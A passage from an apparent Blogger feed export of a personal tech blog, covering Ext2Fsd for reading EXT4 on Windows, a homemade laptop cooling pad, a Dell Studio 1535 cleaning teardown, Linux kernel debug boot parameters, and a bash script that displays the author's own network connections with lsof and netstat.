What I desired was a more simpler approach and along came <a href="http://www.ext2fsd.com/" target="_blank"><b>Ext2Fsd</b></a>. This application allows the EXT4 partition to be mounted and read like a native NTFS. One caveat is that the 'extent' support is still pending so the interaction is limited to read-only which I don't mind since my need in Windows is to only listen to music which lies on the big and chunky EXT4 side.</div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-43454996737437061182012-07-07T08:06:00.003-07:002012-07-08T08:30:15.064-07:00DIY cooling solution...<div dir="ltr" style="text-align: left;" trbidi="on">
I recently bought a new notebook [<i>my old machine was... well old... needed a well deserved retirement. Goodbye ProcyonMk2 you ol' girl! </i>:-P], about 2 months ago. <a href="http://in.asus.com/Notebooks/Versatile_Performance/K53SV/" target="_blank">ASUS K53</a> series, specs are:<br />
<br />
ProcyonMk3:<br />
15.6 inch screen @ 1366x768 WLED screen<br />
<a href="http://ark.intel.com/products/53469/" target="_blank">Intel 2670QM CPU [<i>4 Core + HT = 8 Threads</i>]</a><br />
<a href="http://www.notebookcheck.net/NVIDIA-GeForce-GT-540M.41715.0.html" target="_blank">NVIDIA GT 540M GPU [<i>2GB DDR3 VRAM</i>]</a> <a href="http://www.notebookcheck.net/Nvidia-Optimus-Review.25467.0.html" target="_blank">[Optimus Solution]</a><br />
ASint 8GB DDR3 RAM<br />
<a href="http://www.wdc.com/global/products/specs/?driveID=815&language=1" target="_blank">WDC 5400RPM 750GB HDD</a><br />
USB2.0 x 2, USB3.0 x 1 <br />
Atheros b/g/n Wifi, Realtek Audio, BT3, Altec-Lansing Speakers, 6 Cell Battery.<br />
<br />
Basically a pretty powerful system. I wouldn't attach an ULTRA tag [<i>my way of rating notebooks: low, midrange, high, ultra</i>] to it but would consider it to be a HIGH end machine [<i>a first for me since i am used to owning low to mid-range systems</i>]...<br />
<br />
Anyway, considering a heatwave thats been plaguing the area where I live, a decent cooling solution had to be designed as my old cooling pad was busted with 2 of its fans burnt out.<br />
<br />
So basically I had this old but totally unused 12 volt .3 amps [<i>3.6 watts</i>] DC chassis fan lying around which I had extracted from my desktop since the mobo didn't have a chassis fan socket. Using an old router adapter rated at 12volts .7 amps DC [<i>No.1 rule in Electrical Engg: Voltage should be the same, Current should be equal or more</i>], laptop packaging and some nice nifty tools, made my own DIY cooling pad.<br />
<br />
It turned out pretty good considering its simplicity.<br />
<br />
Pics attached [<i>I'm too lazy to take detailed photos, if you don't understand the design, then leave a comment and I could help you out]</i>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn2ZyG2rkXFSm9NBcRjl6YODODVN1EDvlqLfNTENR7F_fPRaLLDLRtwpS-WnLJBDu4UGcmBuPNgqHZ6M7JXvn86YiabvVBNhCfVzFSWD4L3xYLnmKC5F2eCXll3jLBkIwWTx9TeqQDOZHn/s1600/2012-07-07+20.02.58.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn2ZyG2rkXFSm9NBcRjl6YODODVN1EDvlqLfNTENR7F_fPRaLLDLRtwpS-WnLJBDu4UGcmBuPNgqHZ6M7JXvn86YiabvVBNhCfVzFSWD4L3xYLnmKC5F2eCXll3jLBkIwWTx9TeqQDOZHn/s320/2012-07-07+20.02.58.jpg" width="320" /></a></div>
<div style="text-align: center;">
<i>Pic 1: Underside.</i></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgoUEoD7m0NAbZtSF3FRUC2hO4sXtgJowSs9g3giARpPYAkop4poXL71TnPFOcC-6SQphpRR_IzrcqSSiHTWvq43Mjra5-O05JhRgCcl8Y4VYGWq1-tcvQpUWW8YoQbVdLfGKixZMkdsSl/s1600/2012-07-07+20.03.04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgoUEoD7m0NAbZtSF3FRUC2hO4sXtgJowSs9g3giARpPYAkop4poXL71TnPFOcC-6SQphpRR_IzrcqSSiHTWvq43Mjra5-O05JhRgCcl8Y4VYGWq1-tcvQpUWW8YoQbVdLfGKixZMkdsSl/s320/2012-07-07+20.03.04.jpg" width="320" /></a></div>
<div style="text-align: center;">
<i>Pic 2: Upside.</i></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
End Result: Cool'n'Quiet system, 1 week's lunch money saved :-)<br />
<br />
<b>Update:</b> Since this is a internal desktop chassis fan, it has a high dB level, bloody thing makes noise like a jet engine. Good thing my speakers damp it all out with music... ;-D</div>
</div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-28417458975961950372012-07-04T04:04:00.001-07:002012-07-08T22:42:07.655-07:00Reanimated<div dir="ltr" style="text-align: left;" trbidi="on">
<div bidi="on" dir="ltr" style="text-align: left;" tr="">
<br /></div>
It's been like what... ages... since my last post... so many things have changed. I guess its time I caught up and updated this blog... therefore i am officially reanimating this corner of the web.</div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-9101123053072011802011-03-16T15:36:00.000-07:002011-03-16T15:38:15.914-07:00Japan Earthquake and Fukushima Daiichi Crisis<div dir="ltr" style="text-align: left;" trbidi="on">We are all well aware of the tragic earthquake and tsunami that caused massive damage and great loss of life to the Japanese coastal areas. Also the situation seems very critical at the Fukushima Daiichi nuclear facility where engineers are attempting their best to avert a possible meltdown. My prayers go out to all the people and their families affected and I pray that that they are successful in stabilizing the situation. Also I salute all the people currently involved in the rescue and stabilization process. You are the real heroes guys... </div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com1tag:blogger.com,1999:blog-86576068632769999.post-6100885514949769312011-03-13T13:42:00.000-07:002011-03-13T13:42:51.397-07:00Dell Studio 1535 cleaning/disassembly<div dir="ltr" style="text-align: left;" trbidi="on">The temperature sensors on procyon [My Dell Studio 1535] laptop were constantly hitting abnormal values recently. CPU kept on idling at around 60C, even after my <a href="http://mmaptonull.blogspot.com/2011/02/lmsensors-and-tjunctionmax.html">previous post</a> on the fix for lm_sensors configuration applied. So I knew that it was time I opened the girl up and do her some good'ol fashioned cleaning. So I borrowed a cam, took out my toolbox, acquired some Thermal Compound [Shin-Etsu Microsi's G-751 Thermal Paste (thanks Shray!)] from a good friend, added some Pink Floyd on my playlist and got to work. Here are a few pics of the internals for anyone's viewing pleasure since I could not find any decent teardown images of the same model on the web. Enjoy....<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWX7t1bCdzgwpbvT1MUKYf7ifocQsjJv8j2s1POoKI7Y9eJIHQuV5R8EKuNh85eD5bDGC8tUSrtwuyDzddVYGAUrAXS8oJYoudYS_iuToJOOjH9tLBs76Y5qNwjVrTo355070jhDoTdIom/s1600/IMGP2309.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWX7t1bCdzgwpbvT1MUKYf7ifocQsjJv8j2s1POoKI7Y9eJIHQuV5R8EKuNh85eD5bDGC8tUSrtwuyDzddVYGAUrAXS8oJYoudYS_iuToJOOjH9tLBs76Y5qNwjVrTo355070jhDoTdIom/s200/IMGP2309.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Backplate opened, Fan/Heat-sink assembly and processor removed</td><td class="tr-caption" style="text-align: center;"> </td><td class="tr-caption" style="text-align: center;"> </td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCPi1cCScRP70IxWaIGgqGBhLRpHMiJQ3lsGen72ScdL4ahhuiWgR3QNWazt6S1tPFpU0Kn07lTfhOEjDFkOy5T-YgsyL_wN1Ns_ybaAqJym67AX5g4raOIdwnnexPFVyxO1D7v3tLbp-h/s1600/IMGP2310.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCPi1cCScRP70IxWaIGgqGBhLRpHMiJQ3lsGen72ScdL4ahhuiWgR3QNWazt6S1tPFpU0Kn07lTfhOEjDFkOy5T-YgsyL_wN1Ns_ybaAqJym67AX5g4raOIdwnnexPFVyxO1D7v3tLbp-h/s200/IMGP2310.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Close-up of the first image.</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0rj4CUkT3w4bDuAVuUNObwD6dvDTjKeF-JjH9xANemZo6kogl8FKeT6fpXSaOyzUEx_5OuDhX5ku0xg10bpdMAlGsCAWT6ril4tkLoIQ-mkfYwmP9GkxhP2tB4v6Xh3yac67V2KRk3zaa/s1600/IMGP2306.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0rj4CUkT3w4bDuAVuUNObwD6dvDTjKeF-JjH9xANemZo6kogl8FKeT6fpXSaOyzUEx_5OuDhX5ku0xg10bpdMAlGsCAWT6ril4tkLoIQ-mkfYwmP9GkxhP2tB4v6Xh3yac67V2KRk3zaa/s200/IMGP2306.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The processor[Top]: <a href="http://ark.intel.com/Product.aspx?id=33915">Intel T5750</a> [2GHz, Socket-P, 2MBL2, 667 FSB]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW1PWPeMuoUri41-pnxjZ_n6K3YxYAEPjOMEAqV1F5FJFdAFzUWPz1Glo5BWfCyeRe21ZGfNNan7KhNuqQnzrK7MPh_sFVX1xDK0iFa_THDuHoXLifb1XSF2u-1OHNu8wjxsMAdu119khS/s1600/IMGP2303.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW1PWPeMuoUri41-pnxjZ_n6K3YxYAEPjOMEAqV1F5FJFdAFzUWPz1Glo5BWfCyeRe21ZGfNNan7KhNuqQnzrK7MPh_sFVX1xDK0iFa_THDuHoXLifb1XSF2u-1OHNu8wjxsMAdu119khS/s200/IMGP2303.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The processor[Bottom]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMfLxDi9MqoeffIDINa1DaksjkFA7KLTBRR59y-1BWGDkpqHzZg9XK6lEBiUyQsioOm-gOVSx0k-jsXft7qpqqbqfhCwAsOM4PPUdtxnBXtQJ1idezQAiJcyKAqDO_Wf9u2-znc7kxSMpK/s1600/IMGP2307.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMfLxDi9MqoeffIDINa1DaksjkFA7KLTBRR59y-1BWGDkpqHzZg9XK6lEBiUyQsioOm-gOVSx0k-jsXft7qpqqbqfhCwAsOM4PPUdtxnBXtQJ1idezQAiJcyKAqDO_Wf9u2-znc7kxSMpK/s200/IMGP2307.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Fan/Heat-sink assembly [Top]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPSrMol71X5DNoosXXXek5hyi1MJfbQR2Pz8bz-QyxbTup838vH8OLfpD8TGv0Iti_53T0JSv7iBbPI-GszakJdKxIixSfQgB6uwQmvOCFr1cOrI4O2C_B2z7qyTzmn39U-tkxzb7jAhi2/s1600/IMGP2308.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPSrMol71X5DNoosXXXek5hyi1MJfbQR2Pz8bz-QyxbTup838vH8OLfpD8TGv0Iti_53T0JSv7iBbPI-GszakJdKxIixSfQgB6uwQmvOCFr1cOrI4O2C_B2z7qyTzmn39U-tkxzb7jAhi2/s200/IMGP2308.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Fan/Heat-sink assembly [Bottom] [Note the thermal pads for the MCH and GFX chips]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRpNPfyGB-jLyF7qMOuGoDJN3W5OpPL4CMyzfvNRobPfNahCdUnhVGnMc1rodGB8bMoqtEZGDWlQ_h1yMFKL1dgTaHYEDqxnkWyBbSVBcdL70-SkBUxLXux3HeM04z46Pm3IJwis5Qx8EB/s1600/IMGP2313.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRpNPfyGB-jLyF7qMOuGoDJN3W5OpPL4CMyzfvNRobPfNahCdUnhVGnMc1rodGB8bMoqtEZGDWlQ_h1yMFKL1dgTaHYEDqxnkWyBbSVBcdL70-SkBUxLXux3HeM04z46Pm3IJwis5Qx8EB/s200/IMGP2313.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"> Fan/Heatsink assembly [Top, Fan Removed]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1gZ0auQWHIV8nXi0-4dlm9DQt99-FET3Ocy3c_ppg56jQRN22V-HcPnMDoV06cqxKhdpokikyJOTb2BJafXAtHmcsZ8oGzoeCgoacGtCbO6LGsAd3glXzxOROvPUbDu3YmFHCTKD5VeR9/s1600/IMGP2314.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1gZ0auQWHIV8nXi0-4dlm9DQt99-FET3Ocy3c_ppg56jQRN22V-HcPnMDoV06cqxKhdpokikyJOTb2BJafXAtHmcsZ8oGzoeCgoacGtCbO6LGsAd3glXzxOROvPUbDu3YmFHCTKD5VeR9/s200/IMGP2314.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"> Fan/Heat-sink assembly [Bottom, Fan Removed]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdOGMUxUaKGdf7hv02oJyL44aP38rwPLYSonuy84h1h4x2vhbxGWV5nqSEn0icYE3fpJkEwOtU6K5QgU-J3noISP6SWY4Bs1QNJ2w6z0h50dyXCUg2YJd55PQrxp6Ls7zbc4B73JmCfmtd/s1600/IMGP2315.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdOGMUxUaKGdf7hv02oJyL44aP38rwPLYSonuy84h1h4x2vhbxGWV5nqSEn0icYE3fpJkEwOtU6K5QgU-J3noISP6SWY4Bs1QNJ2w6z0h50dyXCUg2YJd55PQrxp6Ls7zbc4B73JmCfmtd/s200/IMGP2315.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Fan(Dirty) [Top]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoPjXFYpw3AdJXW0unEz2ELhPorO4rueHW1zcFQheHTGbk49fkkR8ytyZRz_bBefPD3ZnKZCAD4bZmDu2Ii82-9TVIYcHbG5PheYXtnDqatWNf_RkvwBSJ7PfrtywEPOWOD8TLff6an9MU/s1600/IMGP2316.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoPjXFYpw3AdJXW0unEz2ELhPorO4rueHW1zcFQheHTGbk49fkkR8ytyZRz_bBefPD3ZnKZCAD4bZmDu2Ii82-9TVIYcHbG5PheYXtnDqatWNf_RkvwBSJ7PfrtywEPOWOD8TLff6an9MU/s200/IMGP2316.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Fan(Dirty) [Bottom]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheaZVqo_ZPGT1jMKihlNVmBF9i6aS7MKGcL7Z5xxL2PAg2M6b331GKdgyTtYLR7SuLcDHnIdl7oLRq5umC8YGBYxCVM8L608zHEffsTsVOMN23EkbjZjg11alk2y_rYcxwL-jnYfBOgXpF/s1600/IMGP2312.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheaZVqo_ZPGT1jMKihlNVmBF9i6aS7MKGcL7Z5xxL2PAg2M6b331GKdgyTtYLR7SuLcDHnIdl7oLRq5umC8YGBYxCVM8L608zHEffsTsVOMN23EkbjZjg11alk2y_rYcxwL-jnYfBOgXpF/s200/IMGP2312.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Partially Cleaned Heat-sink Fins</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji0PUcyPw-WLRfRcCEf3COPSBP2HKk0ywGAp09EylwwXLc0o1rccugeyToKFSUk3MOj1lekBB0a6VzXJdSiyy7wPhebSCi06jSa9RYrcwtSycEBeizghN7JgaCDkDRaU8yzkDOSawrlFSc/s1600/IMGP2318.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji0PUcyPw-WLRfRcCEf3COPSBP2HKk0ywGAp09EylwwXLc0o1rccugeyToKFSUk3MOj1lekBB0a6VzXJdSiyy7wPhebSCi06jSa9RYrcwtSycEBeizghN7JgaCDkDRaU8yzkDOSawrlFSc/s200/IMGP2318.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">ATI Mobility Radeon HD3450 256MB [The 2 chips on the left are the 128MBx2(Samsung) RAMDACs]</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi37FE2YEpDg5WWW8W868Ia7aGhZtDtWno9gNy07JJqC9lVhMni1nB7PkL9UEXpzFSJqpeBX-smUJzMyZaODuMaUgJnH2ksS142Lmfu-SIhLXx5TjnnJpIj2vs1SSrNAsTcVFYdStYKslC9/s1600/IMGP2322.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi37FE2YEpDg5WWW8W868Ia7aGhZtDtWno9gNy07JJqC9lVhMni1nB7PkL9UEXpzFSJqpeBX-smUJzMyZaODuMaUgJnH2ksS142Lmfu-SIhLXx5TjnnJpIj2vs1SSrNAsTcVFYdStYKslC9/s200/IMGP2322.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The Intel 965PM <a href="http://en.wikipedia.org/wiki/Northbridge_%28computing%29">MCH</a></td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEAW9SDdJ8F7C0_6fLbT2fdkuQKVHgHKX_WWrVvFT7Pv95xI34i-df3cBH92akKXmncZG3diNrt3G_qe7EIe0yvfE-EPz054i2wxnH2lGTxwL-1HEWUnIfU86jb49MgJXqE5Y4xkv8s_0S/s1600/IMGP2323.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEAW9SDdJ8F7C0_6fLbT2fdkuQKVHgHKX_WWrVvFT7Pv95xI34i-df3cBH92akKXmncZG3diNrt3G_qe7EIe0yvfE-EPz054i2wxnH2lGTxwL-1HEWUnIfU86jb49MgJXqE5Y4xkv8s_0S/s200/IMGP2323.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The Intel MCH and The <a href="http://en.wikipedia.org/wiki/Socket_P">Socket-P</a> processor socket</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT781L5sIoB0MlT1TyQgkSNzk6WdahSo2ELDxplf_UsvVPBmEP9FCybjJozw99AdJ30Ng83Hool8XOJtvDiZ4rc6HKgLWByWCPZ5sJRljFwTo2Ptycw3hvUZHuXGpn9xrl8CWdiwpa7Iws/s1600/IMGP2328.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT781L5sIoB0MlT1TyQgkSNzk6WdahSo2ELDxplf_UsvVPBmEP9FCybjJozw99AdJ30Ng83Hool8XOJtvDiZ4rc6HKgLWByWCPZ5sJRljFwTo2Ptycw3hvUZHuXGpn9xrl8CWdiwpa7Iws/s200/IMGP2328.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The WPAN and WLAN[<a href="http://www.broadcom.com/products/Wireless-LAN/802.11-Wireless-LAN-Solutions/BCM4312">Broadcom BCM4312</a>] cards.</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ1GVSFwexjyhnbcWAWFmYeks2Eky1Mw16ZmXgJsH1gNtTLMPxy6CiKo3p0B3Y1b3AjWF_ErveCKar9EF5ikflMfwHAmbNBcmssgPt0TFwFrvyaQSSMnkGYCGlft23IW4wfTgUUkDbH5xA/s1600/IMGP2330.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ1GVSFwexjyhnbcWAWFmYeks2Eky1Mw16ZmXgJsH1gNtTLMPxy6CiKo3p0B3Y1b3AjWF_ErveCKar9EF5ikflMfwHAmbNBcmssgPt0TFwFrvyaQSSMnkGYCGlft23IW4wfTgUUkDbH5xA/s200/IMGP2330.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Nanya 1GB DDR2 PC2-5300 @ 333 MHz x2 RAM Cards<span style="color: black; font-family: arial;"><small><small><span style="color: #0000a0;"> </span></small></small></span></td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj72DHsrsS06HSumCU94BiBEqeOnrjRJAH3Z3fYyG9L3wn9D_v_y0adWkikBKlQtikgCLk0cpXs9IJcI2Z1O2Ydjnm534ZQytP7DofXHgU4JPMvt3hWgLdE3x7b_i00Ks5tsatQJhDw5KmZ/s1600/IMGP2331.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj72DHsrsS06HSumCU94BiBEqeOnrjRJAH3Z3fYyG9L3wn9D_v_y0adWkikBKlQtikgCLk0cpXs9IJcI2Z1O2Ydjnm534ZQytP7DofXHgU4JPMvt3hWgLdE3x7b_i00Ks5tsatQJhDw5KmZ/s200/IMGP2331.JPG" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The HDD [<a href="http://www.wdc.com/global/products/specs/?driveID=802&language=1">Western Digital WD3200BPVT</a>] and The DVD drive</td></tr>
</tbody></table><div style="text-align: left;">After a thorough cleaning and application of new thermal grease, the temps have dropped significantly by at least ~10C</div><div style="text-align: left;"><br />
</div><div style="text-align: left;">End result: a cool and quiet system and a wholly satisfied conscience :)</div></div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-6779472310632414152011-03-06T08:11:00.000-08:002011-03-06T08:13:12.037-08:00detailed kernel bootup debug messages<div dir="ltr" style="text-align: left;" trbidi="on">Users like me prefer as much debugging output in applications as possible because this makes performance and stability issues easy to understand. This also allows one to see what all is going on behind the scenes for crash debugging. A few amendments can be added to the kernel boot parameters of a Linux kernel to allow for detailed messages and verbose output:<br />
<br />
By modifying the 'kernel' line in grub or editing the relevant boot file under /boot/grub and adding the following[in <b>bold</b>]:<br />
<br />
<blockquote>kernel /boot/vmlinuz26 root=/dev/disk/by-label/Arch ro <b>debug ignore_loglevel log_buf_len=10M print_fatal_signals=1 LOGLEVEL=8 earlyprintk=vga,keep sched_debug</b></blockquote>heavy debugging can be easily activated.<br />
<br />
<b>debug</b> = activates internal debugging.<br />
<b>ignore_loglevel</b> = ignores any sort of log level and maximizes debug output.<br />
<b>log_buf_len</b> = increases the log buffer length to 10 MiB<br />
<b>print_fatal_signals</b> = print any fatal signals.<br />
<b>LOGLEVEL</b> = enables level 8 logging.<br />
<b>earlyprintk</b> = enables early printing of messages to the vga screen<br />
<b>,keep</b> = keeps the messages on for longer.<br />
<b>sched_debug</b> = Enables verbose scheduler debug messages.<br />
<br />
Ref:<br />
<a href="http://www.kernel.org/doc/Documentation/kernel-parameters.txt">http://www.kernel.org/doc/Documentation/kernel-parameters.txt</a><br />
<a href="https://wiki.archlinux.org/index.php/GRUB#Advanced_Debugging">https://wiki.archlinux.org/index.php/GRUB#Advanced_Debugging</a></div>sandm4nhttp://www.blogger.com/profile/11589033976795300649noreply@blogger.com0tag:blogger.com,1999:blog-86576068632769999.post-164531767545431302011-03-04T11:11:00.000-08:002011-03-04T11:18:24.389-08:00customized slow output on a console<div dir="ltr" style="text-align: left;" trbidi="on">One of the primary scripts I run on my desktop embedded urxvt terminals is an active connections display script. Its primary function is to utilize 'netstat' and 'lsof' to display all TCP/UDP connections to/from my system. The problem comes with running apps such as firefox or feed readers where multiple connections are established that most of the output scrolls away very fast. So I customized the script to slowly output line by line:<br />
<br />
<span style="font-size: x-small;">#!/bin/bash<br />
echo "" > connpoll.log<br />
function read_file()<br />
{<br />
count=0<br />
while read line <br />
do<br />
echo -e "$line" <br />
count=$[$count+1]<br />
sleep .15<br />
if [ $count -eq 12 ]<br />
then<br />
count=0<br />
sleep 3<br />
fi<br />
done < connpoll.log<br />
}<br />
while [ 1 ]<br />
do<br />
echo ">>>>>>>>>>>==ACTIVE CONNECTIONS VIA LSOF==<<<<<<<<<<<" > connpoll.log<br />
lsof -w | grep -e TCP -e UDP >> connpoll.log<br />
echo ">>>>>>>>>>>==ACTIVE CONNECTIONS VIA NETSTAT==<<<<<<<<<<<" >> connpoll.log<br />
netstat --tcp --udp -e -e -a --raw --program -v >> connpoll.log<br />
read_file<br />
sleep 8<br />
done</span><br />
<br />
The infinite while loop runs the 2 commands, directs the output to a file (connpoll.log) and executes the function 'read_file'. 'read_file' takes the file and feeds it to an internal read in the while loop which simply echos a line from the file. The 'sleep .15' provides a small time break between each line and makes the output smooth.<br />
<br />
